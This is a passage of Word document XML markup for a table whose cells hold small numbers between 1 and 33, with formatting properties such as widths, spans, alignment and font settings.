          <w:tcPr>
            <w:tcW w:w="24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0" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="80"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
              </w:rPr>
              <w:t>5</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500" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="180"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>20</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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="520" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="80"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="420" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="100"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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89"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="60"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="40"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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23</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18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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r>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
        <w:trPr>
          <w:trHeight w:val="228"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="240" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="20"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="480" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="36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15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="160"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="100"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="20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7</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25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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4</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33</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80"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>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18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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5</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20</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3"/>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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="480" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="80"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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right="40"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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32</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14</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19</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23</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10</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33</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8</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25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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32</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11</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28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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8</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3"/>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5</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13</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6</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25</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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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33</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="100"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>20</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28</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14</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11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24</w:t>
            </w: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2</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28</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3"/>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25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="480" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="80"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>5</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6</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13</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w w:val="79"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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33</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30</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11</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33</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33</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23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="340" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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5</w:t>
            </w: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4</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3"/>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23</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19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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33</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w w:val="79"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
              </w:rPr>
              <w:t>14</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13</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6</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auto"/>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228" w:lineRule="exact"/>
              <w:ind w:left="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>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18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="20"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="340" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="80"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>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228" w:lineRule="exact"/>
              <w:ind w:left="80"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
              <w:t>20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5</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20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="420" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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33</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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18</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w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>20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gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="20"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="260" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="160"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
              </w:rPr>
              <w:t>1</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gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="80"/>
              <w:jc w:val="right"/>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gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="40"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="20"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="20"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="80"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>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11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="40"/>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auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="40"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>13</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8</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5</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ind w:left="40"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>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3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="80"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="500" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="180"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>11</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33</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15</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23</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w w:val="79"/>
              </w:rPr>
            </w:pPr>
